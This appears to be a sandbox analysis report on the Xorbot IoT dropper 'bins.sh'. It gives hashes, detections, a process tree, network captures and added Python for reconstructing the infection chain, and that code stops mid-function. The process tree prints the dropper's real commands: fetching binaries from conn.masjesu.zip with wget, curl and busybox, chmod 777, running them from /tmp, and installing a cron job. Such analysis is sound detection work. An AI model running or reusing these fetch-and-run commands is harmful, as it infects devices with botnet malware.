Analysis

  • max time kernel
    149s
  • max time network
    147s
  • platform
    ubuntu-18.04_amd64
  • resource
    ubuntu1804-amd64-20240611-en
  • resource tags

    arch:amd64, arch:i386, image:ubuntu1804-amd64-20240611-en, kernel:4.15.0-213-generic, locale:en-us, os:ubuntu-18.04-amd64, system
  • submitted
    28/02/2025, 11:57 UTC

General

  • Target

    bins.sh

  • Size

    10KB

  • MD5

    1c04224c31369b92267e0f914de6faa7

  • SHA1

    a83724c5b8610fae0d070df43be47b501af8c44b

  • SHA256

    27e10f92af7087a71e53ea4397ca1048fae7141974622a595a9fc358c187cd8f

  • SHA512

    f84f0a3d4f25e30aa0b396a8212e44194c1787f5af184c2a20ded76d3b1dc36e52a38c1c8c16ea6d5263807375dbc8fdfc92de6b4f116b68f16650655288b542

  • SSDEEP

    96:YjvjDjZLwsIL8AjnqinuOCaELKCsHA82U99vLv+vuvBGjm9gcSLwsFQMuBSBqBqs:S4H7qAKosvdGrDIF4

Signatures

  • Detects Xorbot 3 IoCs
  • Xorbot

    Xorbot is a Linux botnet and trojan that targets IoT devices.

  • Xorbot family
  • File and Directory Permissions Modification 1 TTPs 4 IoCs

    Adversaries may modify file or directory permissions to evade defenses.

  • Executes dropped EXE 4 IoCs
  • Renames itself 1 IoCs
  • Creates/modifies Cron job 1 TTPs 1 IoCs

    Cron allows running tasks on a schedule, and is commonly used for malware persistence.

  • Enumerates running processes

    Discovers information about currently running processes on the system

  • Reads runtime system information 64 IoCs

    Reads data from the /proc virtual filesystem.

  • System Network Configuration Discovery 1 TTPs 13 IoCs

    Adversaries may gather information about the network configuration of a system.

  • Writes file to tmp directory 12 IoCs

    Malware often drops required files in the /tmp directory.

Processes

  • /tmp/bins.sh
    /tmp/bins.sh
    1⤵
    • Executes dropped EXE
    • Renames itself
    • Reads runtime system information
    PID:1510
    • /bin/rm
      /bin/rm bins.sh
      2⤵
        PID:1511
      • /usr/bin/wget
        wget http://conn.masjesu.zip/bins/6me8L28qp8ZMXxRxrvwNjMhj066PYl9ckx
        2⤵
        • System Network Configuration Discovery
        • Writes file to tmp directory
        PID:1512
      • /usr/bin/curl
        curl -O http://conn.masjesu.zip/bins/6me8L28qp8ZMXxRxrvwNjMhj066PYl9ckx
        2⤵
        • System Network Configuration Discovery
        • Writes file to tmp directory
        PID:1516
      • /bin/busybox
        /bin/busybox wget http://conn.masjesu.zip/bins/6me8L28qp8ZMXxRxrvwNjMhj066PYl9ckx
        2⤵
        • System Network Configuration Discovery
        • Writes file to tmp directory
        PID:1518
      • /bin/chmod
        chmod 777 6me8L28qp8ZMXxRxrvwNjMhj066PYl9ckx
        2⤵
        • File and Directory Permissions Modification
        PID:1519
      • /tmp/6me8L28qp8ZMXxRxrvwNjMhj066PYl9ckx
        ./6me8L28qp8ZMXxRxrvwNjMhj066PYl9ckx
        2⤵
          PID:1520
        • /bin/rm
          rm 6me8L28qp8ZMXxRxrvwNjMhj066PYl9ckx
          2⤵
            PID:1522
          • /usr/bin/wget
            wget http://conn.masjesu.zip/bins/tylUfEdLd2Ho2FuUE0FT8yrYykEPgRIIQq
            2⤵
            • System Network Configuration Discovery
            • Writes file to tmp directory
            PID:1523
          • /usr/bin/curl
            curl -O http://conn.masjesu.zip/bins/tylUfEdLd2Ho2FuUE0FT8yrYykEPgRIIQq
            2⤵
            • System Network Configuration Discovery
            • Writes file to tmp directory
            PID:1524
          • /bin/busybox
            /bin/busybox wget http://conn.masjesu.zip/bins/tylUfEdLd2Ho2FuUE0FT8yrYykEPgRIIQq
            2⤵
            • System Network Configuration Discovery
            • Writes file to tmp directory
            PID:1526
          • /bin/chmod
            chmod 777 tylUfEdLd2Ho2FuUE0FT8yrYykEPgRIIQq
            2⤵
            • File and Directory Permissions Modification
            PID:1527
          • /tmp/tylUfEdLd2Ho2FuUE0FT8yrYykEPgRIIQq
            ./tylUfEdLd2Ho2FuUE0FT8yrYykEPgRIIQq
            2⤵
              PID:1528
            • /bin/rm
              rm tylUfEdLd2Ho2FuUE0FT8yrYykEPgRIIQq
              2⤵
                PID:1530
              • /usr/bin/wget
                wget http://conn.masjesu.zip/bins/j7YkHCn9eenbdEJjjSe4RAXf34IgXaWdQh
                2⤵
                • System Network Configuration Discovery
                • Writes file to tmp directory
                PID:1531
              • /usr/bin/curl
                curl -O http://conn.masjesu.zip/bins/j7YkHCn9eenbdEJjjSe4RAXf34IgXaWdQh
                2⤵
                • System Network Configuration Discovery
                • Writes file to tmp directory
                PID:1532
              • /bin/busybox
                /bin/busybox wget http://conn.masjesu.zip/bins/j7YkHCn9eenbdEJjjSe4RAXf34IgXaWdQh
                2⤵
                • System Network Configuration Discovery
                • Writes file to tmp directory
                PID:1534
              • /bin/chmod
                chmod 777 j7YkHCn9eenbdEJjjSe4RAXf34IgXaWdQh
                2⤵
                • File and Directory Permissions Modification
                PID:1535
              • /tmp/j7YkHCn9eenbdEJjjSe4RAXf34IgXaWdQh
                ./j7YkHCn9eenbdEJjjSe4RAXf34IgXaWdQh
                2⤵
                  PID:1536
                • /bin/rm
                  rm j7YkHCn9eenbdEJjjSe4RAXf34IgXaWdQh
                  2⤵
                    PID:1538
                  • /usr/bin/wget
                    wget http://conn.masjesu.zip/bins/jt9jGRCBvs5W4HfojuNQa26eGDclv8ZsGN
                    2⤵
                    • System Network Configuration Discovery
                    • Writes file to tmp directory
                    PID:1539
                  • /usr/bin/curl
                    curl -O http://conn.masjesu.zip/bins/jt9jGRCBvs5W4HfojuNQa26eGDclv8ZsGN
                    2⤵
                    • System Network Configuration Discovery
                    • Writes file to tmp directory
                    PID:1540
                  • /bin/busybox
                    /bin/busybox wget http://conn.masjesu.zip/bins/jt9jGRCBvs5W4HfojuNQa26eGDclv8ZsGN
                    2⤵
                    • System Network Configuration Discovery
                    • Writes file to tmp directory
                    PID:1542
                  • /bin/chmod
                    chmod 777 jt9jGRCBvs5W4HfojuNQa26eGDclv8ZsGN
                    2⤵
                    • File and Directory Permissions Modification
                    PID:1543
                  • /usr/bin/crontab
                    crontab -l
                    2⤵
                      PID:1547
                    • /usr/bin/crontab
                      crontab -
                      2⤵
                      • Creates/modifies Cron job
                      PID:1549
                    • /bin/rm
                      rm jt9jGRCBvs5W4HfojuNQa26eGDclv8ZsGN
                      2⤵
                        PID:1551
                      • /usr/bin/wget
                        wget http://conn.masjesu.zip/bins/Lh2XFnF0IQ4hRp0Ecm8nGBqLKD7wLDvUo7
                        2⤵
                        • System Network Configuration Discovery
                        PID:1554
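The process tree above is the standard IoT drop-and-run loop: the script deletes itself (`rm bins.sh`), then for each architecture build tries wget, curl and `busybox wget` in turn to pull the payload into /tmp, `chmod 777`s it, executes it, removes it and moves on to the next build; around the fourth build it also reads the current crontab (`crontab -l`) and installs one from stdin (`crontab -`). The Python below is an added example, not part of the sandbox report: it reconstructs that chain from process command lines and extracts the IoCs. The event list is constructed from the report's process tree, and the stage names and regexes are ours.

```python
import re
from collections import defaultdict
from urllib.parse import urlparse

# Constructed from the process tree in the report above: (pid, command line),
# children of /tmp/bins.sh in spawn order (a subset, to keep the list short).
EVENTS = [
    (1511, "/bin/rm bins.sh"),
    (1512, "wget http://conn.masjesu.zip/bins/6me8L28qp8ZMXxRxrvwNjMhj066PYl9ckx"),
    (1516, "curl -O http://conn.masjesu.zip/bins/6me8L28qp8ZMXxRxrvwNjMhj066PYl9ckx"),
    (1518, "/bin/busybox wget http://conn.masjesu.zip/bins/6me8L28qp8ZMXxRxrvwNjMhj066PYl9ckx"),
    (1519, "chmod 777 6me8L28qp8ZMXxRxrvwNjMhj066PYl9ckx"),
    (1520, "./6me8L28qp8ZMXxRxrvwNjMhj066PYl9ckx"),
    (1522, "rm 6me8L28qp8ZMXxRxrvwNjMhj066PYl9ckx"),
    (1539, "wget http://conn.masjesu.zip/bins/jt9jGRCBvs5W4HfojuNQa26eGDclv8ZsGN"),
    (1543, "chmod 777 jt9jGRCBvs5W4HfojuNQa26eGDclv8ZsGN"),
    (1547, "crontab -l"),
    (1549, "crontab -"),
    (1551, "rm jt9jGRCBvs5W4HfojuNQa26eGDclv8ZsGN"),
    (1554, "wget http://conn.masjesu.zip/bins/Lh2XFnF0IQ4hRp0Ecm8nGBqLKD7wLDvUo7"),
]

# Our own stage detectors (not taken from the report).
FETCH_RE = re.compile(r"^(?:/bin/busybox\s+)?(?:/usr/bin/)?(?:wget|curl)\b")
URL_RE = re.compile(r"https?://[^\s'\"]+")
CHMOD_RE = re.compile(r"^(?:/bin/)?chmod\s+(\S+)\s+(\S+)$")
EXEC_RE = re.compile(r"^(?:\./|/tmp/)([^/\s]+)$")
RM_RE = re.compile(r"^(?:/bin/)?rm\s+(?:-\S+\s+)?(\S+)$")
CRON_STDIN_RE = re.compile(r"^(?:/usr/bin/)?crontab\s+-$")

FULL_CHAIN = ("fetch", "chmod", "exec", "rm")


def makes_executable(mode):
    """True if a chmod mode argument sets an execute bit (octal or symbolic form)."""
    if re.fullmatch(r"[0-7]{3,4}", mode):
        return int(mode, 8) & 0o111 != 0
    return "x" in mode and "-x" not in mode


def classify(cmd):
    """Map one command line to (stage, dropped-file name, url or None), or None if uninteresting."""
    if FETCH_RE.match(cmd):
        m = URL_RE.search(cmd)
        if m:
            name = urlparse(m.group(0)).path.rsplit("/", 1)[-1]
            return "fetch", name, m.group(0)
    m = CHMOD_RE.match(cmd)
    if m and makes_executable(m.group(1)):
        return "chmod", m.group(2), None
    m = EXEC_RE.match(cmd)
    if m:
        return "exec", m.group(1), None
    m = RM_RE.match(cmd)
    if m:
        return "rm", m.group(1), None
    return None


def analyse(events):
    """Group stages per dropped file, keeping first-seen order; repeated fetchers collapse to one stage."""
    chains = defaultdict(lambda: {"stages": [], "urls": []})
    for _pid, cmd in events:
        hit = classify(cmd)
        if hit is None:
            continue
        stage, name, url = hit
        rec = chains[name]
        if stage not in rec["stages"]:
            rec["stages"].append(stage)
        if url and url not in rec["urls"]:
            rec["urls"].append(url)
    return dict(chains)


def full_chains(chains):
    """Files that were fetched, made executable, run and deleted: the complete drop-and-run loop."""
    return sorted(n for n, r in chains.items() if set(FULL_CHAIN) <= set(r["stages"]))


def c2_hosts(chains):
    """Distinct download hosts seen in fetch commands."""
    return sorted({urlparse(u).netloc for r in chains.values() for u in r["urls"]})


def cron_installs(events):
    """PIDs that installed a crontab from stdin (`crontab -`), consistent with the
    (crontab -l; echo ...) | crontab - append idiom."""
    return [pid for pid, cmd in events if CRON_STDIN_RE.match(cmd)]
```

On the constructed events, `analyse(EVENTS)` flags `6me8L28qp8ZMXxRxrvwNjMhj066PYl9ckx` as a complete fetch/chmod/exec/rm chain, `jt9jGRCBvs5W4HfojuNQa26eGDclv8ZsGN` as fetch/chmod/rm with no observed exec, and PID 1549 as a stdin crontab install. On a real host the same logic runs over auditd execve records or an EDR process feed. Mounting /tmp noexec blocks direct execve of binaries dropped there (the `./name` step), which is a useful hardening step but not a guarantee, and it does not stop the script itself from being run as `sh bins.sh`.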

                    Network

                    • [AU]
                      DNS
                      conn.masjesu.zip
                      Remote address:
                      1.1.1.1:53
                      Request
                      conn.masjesu.zip
                      IN A
                      Response
                      conn.masjesu.zip
                      IN A
                      216.126.231.240
                      conn.masjesu.zip
                      IN A
                      37.44.238.88
                    • [AU]
                      DNS
                      conn.masjesu.zip
                      Remote address:
                      1.1.1.1:53
                      Request
                      conn.masjesu.zip
                      IN AAAA
                      Response
                    • [FR]
                      GET
                      http://conn.masjesu.zip/bins/6me8L28qp8ZMXxRxrvwNjMhj066PYl9ckx
                      Remote address:
                      37.44.238.88:80
                      Request
                      GET /bins/6me8L28qp8ZMXxRxrvwNjMhj066PYl9ckx HTTP/1.1
                      User-Agent: Wget/1.19.4 (linux-gnu)
                      Accept: */*
                      Accept-Encoding: identity
                      Host: conn.masjesu.zip
                      Connection: Keep-Alive
                      Response
                      HTTP/1.1 200 OK
                      Server: nginx/1.22.1
                      Date: Fri, 28 Feb 2025 11:58:01 GMT
                      Content-Type: application/octet-stream
                      Content-Length: 122566
                      Connection: keep-alive
                      Last-Modified: Fri, 28 Feb 2025 10:00:01 GMT
                      ETag: "67c18921-1dec6"
                      X-Cache-Status: HIT
                      Accept-Ranges: bytes
                    • [FR]
                      GET
                      http://conn.masjesu.zip/bins/6me8L28qp8ZMXxRxrvwNjMhj066PYl9ckx
                      Remote address:
                      37.44.238.88:80
                      Request
                      GET /bins/6me8L28qp8ZMXxRxrvwNjMhj066PYl9ckx HTTP/1.1
                      Host: conn.masjesu.zip
                      User-Agent: curl/7.58.0
                      Accept: */*
                      Response
                      HTTP/1.1 200 OK
                      Server: nginx/1.22.1
                      Date: Fri, 28 Feb 2025 11:58:02 GMT
                      Content-Type: application/octet-stream
                      Content-Length: 122566
                      Connection: keep-alive
                      Last-Modified: Fri, 28 Feb 2025 10:00:01 GMT
                      ETag: "67c18921-1dec6"
                      X-Cache-Status: HIT
                      Accept-Ranges: bytes
                    • [FR]
                      GET
                      http://conn.masjesu.zip/bins/6me8L28qp8ZMXxRxrvwNjMhj066PYl9ckx
                      Remote address:
                      37.44.238.88:80
                      Request
                      GET /bins/6me8L28qp8ZMXxRxrvwNjMhj066PYl9ckx HTTP/1.1
                      Host: conn.masjesu.zip
                      User-Agent: Wget
                      Connection: close
                      Response
                      HTTP/1.1 200 OK
                      Server: nginx/1.22.1
                      Date: Fri, 28 Feb 2025 11:58:02 GMT
                      Content-Type: application/octet-stream
                      Content-Length: 122566
                      Connection: close
                      Last-Modified: Fri, 28 Feb 2025 10:00:01 GMT
                      ETag: "67c18921-1dec6"
                      X-Cache-Status: HIT
                      Accept-Ranges: bytes
                    • [FR]
                      GET
                      http://conn.masjesu.zip/bins/tylUfEdLd2Ho2FuUE0FT8yrYykEPgRIIQq
                      Remote address:
                      37.44.238.88:80
                      Request
                      GET /bins/tylUfEdLd2Ho2FuUE0FT8yrYykEPgRIIQq HTTP/1.1
                      User-Agent: Wget/1.19.4 (linux-gnu)
                      Accept: */*
                      Accept-Encoding: identity
                      Host: conn.masjesu.zip
                      Connection: Keep-Alive
                      Response
                      HTTP/1.1 200 OK
                      Server: nginx/1.22.1
                      Date: Fri, 28 Feb 2025 11:58:02 GMT
                      Content-Type: application/octet-stream
                      Content-Length: 155208
                      Connection: keep-alive
                      Last-Modified: Fri, 28 Feb 2025 10:00:02 GMT
                      ETag: "67c18922-25e48"
                      X-Cache-Status: HIT
                      Accept-Ranges: bytes
                    • [FR]
                      GET
                      http://conn.masjesu.zip/bins/tylUfEdLd2Ho2FuUE0FT8yrYykEPgRIIQq
                      Remote address:
                      37.44.238.88:80
                      Request
                      GET /bins/tylUfEdLd2Ho2FuUE0FT8yrYykEPgRIIQq HTTP/1.1
                      Host: conn.masjesu.zip
                      User-Agent: curl/7.58.0
                      Accept: */*
                      Response
                      HTTP/1.1 200 OK
                      Server: nginx/1.22.1
                      Date: Fri, 28 Feb 2025 11:58:03 GMT
                      Content-Type: application/octet-stream
                      Content-Length: 155208
                      Connection: keep-alive
                      Last-Modified: Fri, 28 Feb 2025 10:00:02 GMT
                      ETag: "67c18922-25e48"
                      X-Cache-Status: HIT
                      Accept-Ranges: bytes
                    • [FR]
                      GET
                      http://conn.masjesu.zip/bins/tylUfEdLd2Ho2FuUE0FT8yrYykEPgRIIQq
                      Remote address:
                      37.44.238.88:80
                      Request
                      GET /bins/tylUfEdLd2Ho2FuUE0FT8yrYykEPgRIIQq HTTP/1.1
                      Host: conn.masjesu.zip
                      User-Agent: Wget
                      Connection: close
                      Response
                      HTTP/1.1 200 OK
                      Server: nginx/1.22.1
                      Date: Fri, 28 Feb 2025 11:58:03 GMT
                      Content-Type: application/octet-stream
                      Content-Length: 155208
                      Connection: close
                      Last-Modified: Fri, 28 Feb 2025 10:00:02 GMT
                      ETag: "67c18922-25e48"
                      X-Cache-Status: HIT
                      Accept-Ranges: bytes
                    • [FR]
                      GET
                      http://conn.masjesu.zip/bins/j7YkHCn9eenbdEJjjSe4RAXf34IgXaWdQh
                      Remote address:
                      37.44.238.88:80
                      Request
                      GET /bins/j7YkHCn9eenbdEJjjSe4RAXf34IgXaWdQh HTTP/1.1
                      User-Agent: Wget/1.19.4 (linux-gnu)
                      Accept: */*
                      Accept-Encoding: identity
                      Host: conn.masjesu.zip
                      Connection: Keep-Alive
                      Response
                      HTTP/1.1 200 OK
                      Server: nginx/1.22.1
                      Date: Fri, 28 Feb 2025 11:58:03 GMT
                      Content-Type: application/octet-stream
                      Content-Length: 125455
                      Connection: keep-alive
                      Last-Modified: Fri, 28 Feb 2025 10:00:02 GMT
                      ETag: "67c18922-1ea0f"
                      X-Cache-Status: HIT
                      Accept-Ranges: bytes
                    • [FR]
                      GET
                      http://conn.masjesu.zip/bins/j7YkHCn9eenbdEJjjSe4RAXf34IgXaWdQh
                      Remote address:
                      37.44.238.88:80
                      Request
                      GET /bins/j7YkHCn9eenbdEJjjSe4RAXf34IgXaWdQh HTTP/1.1
                      Host: conn.masjesu.zip
                      User-Agent: curl/7.58.0
                      Accept: */*
                      Response
                      HTTP/1.1 200 OK
                      Server: nginx/1.22.1
                      Date: Fri, 28 Feb 2025 11:58:03 GMT
                      Content-Type: application/octet-stream
                      Content-Length: 125455
                      Connection: keep-alive
                      Last-Modified: Fri, 28 Feb 2025 10:00:02 GMT
                      ETag: "67c18922-1ea0f"
                      X-Cache-Status: HIT
                      Accept-Ranges: bytes
                    • [FR]
                      GET
                      http://conn.masjesu.zip/bins/j7YkHCn9eenbdEJjjSe4RAXf34IgXaWdQh
                      Remote address:
                      37.44.238.88:80
                      Request
                      GET /bins/j7YkHCn9eenbdEJjjSe4RAXf34IgXaWdQh HTTP/1.1
                      Host: conn.masjesu.zip
                      User-Agent: Wget
                      Connection: close
                      Response
                      HTTP/1.1 200 OK
                      Server: nginx/1.22.1
                      Date: Fri, 28 Feb 2025 11:58:04 GMT
                      Content-Type: application/octet-stream
                      Content-Length: 125455
                      Connection: close
                      Last-Modified: Fri, 28 Feb 2025 10:00:02 GMT
                      ETag: "67c18922-1ea0f"
                      X-Cache-Status: HIT
                      Accept-Ranges: bytes
                    • [FR]
                      GET
                      http://conn.masjesu.zip/bins/jt9jGRCBvs5W4HfojuNQa26eGDclv8ZsGN
                      Remote address:
                      37.44.238.88:80
                      Request
                      GET /bins/jt9jGRCBvs5W4HfojuNQa26eGDclv8ZsGN HTTP/1.1
                      User-Agent: Wget/1.19.4 (linux-gnu)
                      Accept: */*
                      Accept-Encoding: identity
                      Host: conn.masjesu.zip
                      Connection: Keep-Alive
                      Response
                      HTTP/1.1 200 OK
                      Server: nginx/1.22.1
                      Date: Fri, 28 Feb 2025 11:58:04 GMT
                      Content-Type: application/octet-stream
                      Content-Length: 101654
                      Connection: keep-alive
                      Last-Modified: Fri, 28 Feb 2025 10:00:03 GMT
                      ETag: "67c18923-18d16"
                      X-Cache-Status: HIT
                      Accept-Ranges: bytes
                    • [FR]
                      GET
                      http://conn.masjesu.zip/bins/jt9jGRCBvs5W4HfojuNQa26eGDclv8ZsGN
                      Remote address:
                      37.44.238.88:80
                      Request
                      GET /bins/jt9jGRCBvs5W4HfojuNQa26eGDclv8ZsGN HTTP/1.1
                      Host: conn.masjesu.zip
                      User-Agent: curl/7.58.0
                      Accept: */*
                      Response
                      HTTP/1.1 200 OK
                      Server: nginx/1.22.1
                      Date: Fri, 28 Feb 2025 11:58:04 GMT
                      Content-Type: application/octet-stream
                      Content-Length: 101654
                      Connection: keep-alive
                      Last-Modified: Fri, 28 Feb 2025 10:00:03 GMT
                      ETag: "67c18923-18d16"
                      X-Cache-Status: HIT
                      Accept-Ranges: bytes
                    • [FR]
                      GET
                      http://conn.masjesu.zip/bins/jt9jGRCBvs5W4HfojuNQa26eGDclv8ZsGN
                      Remote address:
                      37.44.238.88:80
                      Request
                      GET /bins/jt9jGRCBvs5W4HfojuNQa26eGDclv8ZsGN HTTP/1.1
                      Host: conn.masjesu.zip
                      User-Agent: Wget
                      Connection: close
                      Response
                      HTTP/1.1 200 OK
                      Server: nginx/1.22.1
                      Date: Fri, 28 Feb 2025 11:58:05 GMT
                      Content-Type: application/octet-stream
                      Content-Length: 101654
                      Connection: close
                      Last-Modified: Fri, 28 Feb 2025 10:00:03 GMT
                      ETag: "67c18923-18d16"
                      X-Cache-Status: HIT
                      Accept-Ranges: bytes
                    • 216.126.231.240:80
                      conn.masjesu.zip
                      180 B
                      3
                    • 185.125.188.61:443
                      tls
                      135 B
                      2
                    • 185.125.188.61:443
                      tls
                      135 B
                      2
                    • 151.101.193.91:443
                      tls, https
                      233 B
                      40 B
                      1
                      1
                    • 151.101.193.91:443
                      extensions.gnome.org
                      tls
                      976 B
                      5.8kB
                      12
                      14
                    • 195.181.164.14:443
                      tls, https
                      26.0kB
                      100
                    • 37.44.238.88:80
                      http://conn.masjesu.zip/bins/6me8L28qp8ZMXxRxrvwNjMhj066PYl9ckx
                      http
                      2.9kB
                      127.8kB
                      52
                      95

                      HTTP Request

                      GET http://conn.masjesu.zip/bins/6me8L28qp8ZMXxRxrvwNjMhj066PYl9ckx

                      HTTP Response

                      200
                    • 37.44.238.88:80
                      http://conn.masjesu.zip/bins/6me8L28qp8ZMXxRxrvwNjMhj066PYl9ckx
                      http
                      2.6kB
                      127.8kB
                      48
                      95

                      HTTP Request

                      GET http://conn.masjesu.zip/bins/6me8L28qp8ZMXxRxrvwNjMhj066PYl9ckx

                      HTTP Response

                      200
                    • 37.44.238.88:80
                      http://conn.masjesu.zip/bins/6me8L28qp8ZMXxRxrvwNjMhj066PYl9ckx
                      http
                      634 B
                      15.5kB
                      10
                      13

                      HTTP Request

                      GET http://conn.masjesu.zip/bins/6me8L28qp8ZMXxRxrvwNjMhj066PYl9ckx

                      HTTP Response

                      200
                    • 37.44.238.88:80
                      http://conn.masjesu.zip/bins/tylUfEdLd2Ho2FuUE0FT8yrYykEPgRIIQq
                      http
                      3.3kB
                      161.7kB
                      56
                      119

                      HTTP Request

                      GET http://conn.masjesu.zip/bins/tylUfEdLd2Ho2FuUE0FT8yrYykEPgRIIQq

                      HTTP Response

                      200
                    • 37.44.238.88:80
                      http://conn.masjesu.zip/bins/tylUfEdLd2Ho2FuUE0FT8yrYykEPgRIIQq
                      http
                      2.8kB
                      161.7kB
                      51
                      119

                      HTTP Request

                      GET http://conn.masjesu.zip/bins/tylUfEdLd2Ho2FuUE0FT8yrYykEPgRIIQq

                      HTTP Response

                      200
                    • 37.44.238.88:80
                      http://conn.masjesu.zip/bins/tylUfEdLd2Ho2FuUE0FT8yrYykEPgRIIQq
                      http
                      994 B
                      42.0kB
                      19
                      32

                      HTTP Request

                      GET http://conn.masjesu.zip/bins/tylUfEdLd2Ho2FuUE0FT8yrYykEPgRIIQq

                      HTTP Response

                      200
                    • 37.44.238.88:80
                      http://conn.masjesu.zip/bins/j7YkHCn9eenbdEJjjSe4RAXf34IgXaWdQh
                      http
                      2.8kB
                      130.8kB
                      51
                      97

                      HTTP Request

                      GET http://conn.masjesu.zip/bins/j7YkHCn9eenbdEJjjSe4RAXf34IgXaWdQh

                      HTTP Response

                      200
                    • 37.44.238.88:80
                      http://conn.masjesu.zip/bins/j7YkHCn9eenbdEJjjSe4RAXf34IgXaWdQh
                      http
                      2.4kB
                      130.8kB
                      44
                      97

                      HTTP Request

                      GET http://conn.masjesu.zip/bins/j7YkHCn9eenbdEJjjSe4RAXf34IgXaWdQh

                      HTTP Response

                      200
                    • 37.44.238.88:80
                      http://conn.masjesu.zip/bins/j7YkHCn9eenbdEJjjSe4RAXf34IgXaWdQh
                      http
                      994 B
                      42.0kB
                      19
                      32

                      HTTP Request

                      GET http://conn.masjesu.zip/bins/j7YkHCn9eenbdEJjjSe4RAXf34IgXaWdQh

                      HTTP Response

                      200
                    • 37.44.238.88:80
                      http://conn.masjesu.zip/bins/jt9jGRCBvs5W4HfojuNQa26eGDclv8ZsGN
                      http
                      1.9kB
                      106.1kB
                      33
                      80

                      HTTP Request

                      GET http://conn.masjesu.zip/bins/jt9jGRCBvs5W4HfojuNQa26eGDclv8ZsGN

                      HTTP Response

                      200
                    • 37.44.238.88:80
                      http://conn.masjesu.zip/bins/jt9jGRCBvs5W4HfojuNQa26eGDclv8ZsGN
                      http
                      2.2kB
                      106.0kB
                      39
                      79

                      HTTP Request

                      GET http://conn.masjesu.zip/bins/jt9jGRCBvs5W4HfojuNQa26eGDclv8ZsGN

                      HTTP Response

                      200
                    • 37.44.238.88:80
                      http://conn.masjesu.zip/bins/jt9jGRCBvs5W4HfojuNQa26eGDclv8ZsGN
                      http
                      1.0kB
                      42.0kB
                      20
                      32

                      HTTP Request

                      GET http://conn.masjesu.zip/bins/jt9jGRCBvs5W4HfojuNQa26eGDclv8ZsGN

                      HTTP Response

                      200
                    • 216.126.231.240:443
                      conn.masjesu.zip
                      120 B
                      2
                    • 37.44.238.88:80
                      conn.masjesu.zip
                      164 B
                      112 B
                      3
                      2
                    • 216.126.231.240:443
                      conn.masjesu.zip
                      180 B
                      3
                    • 216.126.231.240:443
                      conn.masjesu.zip
                      120 B
                      2
                    • 216.126.231.240:443
                      conn.masjesu.zip
                      120 B
                      2
                    • 216.126.231.240:443
                      conn.masjesu.zip
                      120 B
                      2
                    • 216.126.231.240:443
                      conn.masjesu.zip
                      120 B
                      2
                    • 216.126.231.240:443
                      conn.masjesu.zip
                      120 B
                      2
                    • 216.126.231.240:443
                      conn.masjesu.zip
                      120 B
                      2
                    • 216.126.231.240:443
                      conn.masjesu.zip
                      120 B
                      2
                    • 216.126.231.240:443
                      conn.masjesu.zip
                      120 B
                      2
                    • 216.126.231.240:443
                      conn.masjesu.zip
                      120 B
                      2
                    • 216.126.231.240:443
                      conn.masjesu.zip
                      120 B
                      2
                    • 216.126.231.240:443
                      conn.masjesu.zip
                      120 B
                      2
                    • 216.126.231.240:443
                      conn.masjesu.zip
                      120 B
                      2
                    • 216.126.231.240:443
                      conn.masjesu.zip
                      120 B
                      2
                    • 216.126.231.240:443
                      conn.masjesu.zip
                      240 B
                      4
                    • 216.126.231.240:443
                      conn.masjesu.zip
                      120 B
                      2
                    • 216.126.231.240:443
                      conn.masjesu.zip
                      120 B
                      2
                    • 216.126.231.240:443
                      conn.masjesu.zip
                      120 B
                      2
                    • 216.126.231.240:443
                      conn.masjesu.zip
                      120 B
                      2
                    • 216.126.231.240:443
                      conn.masjesu.zip
                      180 B
                      3
                    • 1.1.1.1:53
                      conn.masjesu.zip
                      dns
                      73 B
                      105 B
                      1
                      1

                      DNS Request

                      conn.masjesu.zip

                      DNS Response

                      216.126.231.240
                      37.44.238.88

                    • 1.1.1.1:53
                      conn.masjesu.zip
                      dns
                      73 B
                      136 B
                      1
                      1

                      DNS Request

                      conn.masjesu.zip

                    • 224.0.0.251:5353
                      146 B
                      2
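Every payload response above comes from `nginx/1.22.1` with an ETag of the form `"<hex>-<hex>"`, which is nginx's default ETag: the file's modification time and its size, both in hex. That gives a free consistency check (the size must equal Content-Length and the time must equal Last-Modified) and a pivot for recognising the same build when it is served from another host or under another path. The requests also show the three fetchers' distinct signatures: GNU wget's `Wget/1.19.4 (linux-gnu)` with `Connection: Keep-Alive`, `curl/7.58.0`, and the bare `Wget` with `Connection: close` that the busybox applet sends. The Python below is an added example, not part of the report; the header blocks and the ETag/Content-Length table are constructed from the captures above.

```python
import re
from datetime import datetime, timezone
from email.utils import parsedate_to_datetime

# Constructed from the captures above: the three requests for the first payload,
# one per fetcher, and the nginx response they all received.
REQUESTS = {
    "gnu-wget": (
        "GET /bins/6me8L28qp8ZMXxRxrvwNjMhj066PYl9ckx HTTP/1.1\r\n"
        "User-Agent: Wget/1.19.4 (linux-gnu)\r\nAccept: */*\r\n"
        "Accept-Encoding: identity\r\nHost: conn.masjesu.zip\r\nConnection: Keep-Alive\r\n"
    ),
    "curl": (
        "GET /bins/6me8L28qp8ZMXxRxrvwNjMhj066PYl9ckx HTTP/1.1\r\n"
        "Host: conn.masjesu.zip\r\nUser-Agent: curl/7.58.0\r\nAccept: */*\r\n"
    ),
    "busybox-wget": (
        "GET /bins/6me8L28qp8ZMXxRxrvwNjMhj066PYl9ckx HTTP/1.1\r\n"
        "Host: conn.masjesu.zip\r\nUser-Agent: Wget\r\nConnection: close\r\n"
    ),
}
RESPONSE = (
    "HTTP/1.1 200 OK\r\nServer: nginx/1.22.1\r\n"
    "Date: Fri, 28 Feb 2025 11:58:01 GMT\r\nContent-Type: application/octet-stream\r\n"
    "Content-Length: 122566\r\nConnection: keep-alive\r\n"
    "Last-Modified: Fri, 28 Feb 2025 10:00:01 GMT\r\nETag: \"67c18921-1dec6\"\r\n"
    "X-Cache-Status: HIT\r\nAccept-Ranges: bytes\r\n"
)
# ETag and Content-Length of each payload served during the run (from the report).
PAYLOADS = {
    "6me8L28qp8ZMXxRxrvwNjMhj066PYl9ckx": ('"67c18921-1dec6"', 122566),
    "tylUfEdLd2Ho2FuUE0FT8yrYykEPgRIIQq": ('"67c18922-25e48"', 155208),
    "j7YkHCn9eenbdEJjjSe4RAXf34IgXaWdQh": ('"67c18922-1ea0f"', 125455),
    "jt9jGRCBvs5W4HfojuNQa26eGDclv8ZsGN": ('"67c18923-18d16"', 101654),
}

NGINX_ETAG_RE = re.compile(r'^(?:W/)?"([0-9a-f]+)-([0-9a-f]+)"$')


def parse_message(raw):
    """Split an HTTP request or response into (start line, {lowercase header name: value})."""
    lines = [l for l in raw.replace("\r\n", "\n").split("\n") if l]
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")  # split on the first colon only
        headers[name.strip().lower()] = value.strip()
    return lines[0], headers


def decode_nginx_etag(etag):
    """nginx's default ETag is "<hex mtime>-<hex size>". Returns (mtime as UTC datetime, size) or None."""
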